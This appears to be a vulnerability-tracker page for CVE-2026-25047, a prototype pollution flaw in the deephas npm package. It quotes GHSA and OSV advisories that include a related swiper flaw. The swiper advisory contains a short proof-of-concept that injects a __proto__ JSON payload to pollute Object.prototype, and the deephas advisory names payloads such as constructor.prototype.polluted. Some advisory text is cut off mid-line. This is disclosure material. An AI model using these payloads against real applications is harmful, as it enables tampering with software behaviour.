CVE-2026-25047
published 2026-01-29CVE-2026-25047: deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7…
PriorityP354high8.8CVSS 3.1
AVLACLPRLUINSCCHIHAH
EXPLOIT
EPSS
0.72%
49.1th percentile
deepHas provides a test for the existence of a nested object key and optionally returns that key. A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deephas_project | deephas | >= 0 < 1.0.8 | 1.0.8 |
| sharpred | deephas | < 1.0.7 | 1.0.7 |
| sharpred | deephas | — | — |
| swiperjs | swiper | >= 6.5.1 < 12.1.2 | 12.1.2 |
CVSS provenance
nvdv3.18.8HIGHCVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv4.09.4CRITICALCVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
Prototype pollution in swiper
ghsa·2026-02-19
CVE-2026-27212 [CRITICAL] CWE-1321 Prototype pollution in swiper
Prototype pollution in swiper
### Summary
A prototype pollution vulnerability exists in the the npm package swiper (>=6.5.1, -1;
let obj = {};
var malicious_payload = '{"__proto__":{"polluted":"yes"}}';
console.log({}.polluted);
swiper.default.extendDefaults(JSON.parse(malicious_payload));
console.log({}.polluted); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred
```
#### Expected behavior
Prototype pollution should be prevented and {} should not gain new properties.
This should be printed on the console:
```
undefined
undefined OR throw an Error
```
#### Actual behavior
Object.prototype is polluted
This is printed on the console:
```
undefined
yes
```
### Impact
This is a prototype pollution vulnerability, which can have severe security implicat
OSV
Prototype pollution in swiper
osv·2026-02-19
CVE-2026-27212 [CRITICAL] Prototype pollution in swiper
Prototype pollution in swiper
### Summary
A prototype pollution vulnerability exists in the the npm package swiper (>=6.5.1, -1;
let obj = {};
var malicious_payload = '{"__proto__":{"polluted":"yes"}}';
console.log({}.polluted);
swiper.default.extendDefaults(JSON.parse(malicious_payload));
console.log({}.polluted); // prints yes -> indicating that the patch was bypassed and prototype pollution occurred
```
#### Expected behavior
Prototype pollution should be prevented and {} should not gain new properties.
This should be printed on the console:
```
undefined
undefined OR throw an Error
```
#### Actual behavior
Object.prototype is polluted
This is printed on the console:
```
undefined
yes
```
### Impact
This is a prototype pollution vulnerability, which can have severe security implicat
GHSA
deepHas vulnerable to Prototype Pollution via constructor.prototype
ghsa·2026-01-29
CVE-2026-25047 [CRITICAL] CWE-1321 deepHas vulnerable to Prototype Pollution via constructor.prototype
deepHas vulnerable to Prototype Pollution via constructor.prototype
### Summary
A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.
### Details
The vulnerability resides in the `add()` function and `indexer()` function implemented within `deepHas.js`. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking against forbidden string usage (using String.prototype.indexOf), this check can be bypassed as shown in the PoC
By doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or __proto__.polluted resulti
OSV
deepHas vulnerable to Prototype Pollution via constructor.prototype
osv·2026-01-29
CVE-2026-25047 [CRITICAL] deepHas vulnerable to Prototype Pollution via constructor.prototype
deepHas vulnerable to Prototype Pollution via constructor.prototype
### Summary
A prototype pollution vulnerability exists in version 1.0.7 of the deephas npm package that allows an attacker to modify global object behavior. This issue was fixed in version 1.0.8.
### Details
The vulnerability resides in the `add()` function and `indexer()` function implemented within `deepHas.js`. Although version 1.0.7 attempts to prevent prototype pollution by checking property ownership (e.g., using Object.hasOwnProperty) and by checking against forbidden string usage (using String.prototype.indexOf), this check can be bypassed as shown in the PoC
By doing so, an attacker can inject properties into Object.prototype through a payload such as constructor.prototype.polluted or __proto__.polluted resulti
No detection rules found.
2026-01-29
Published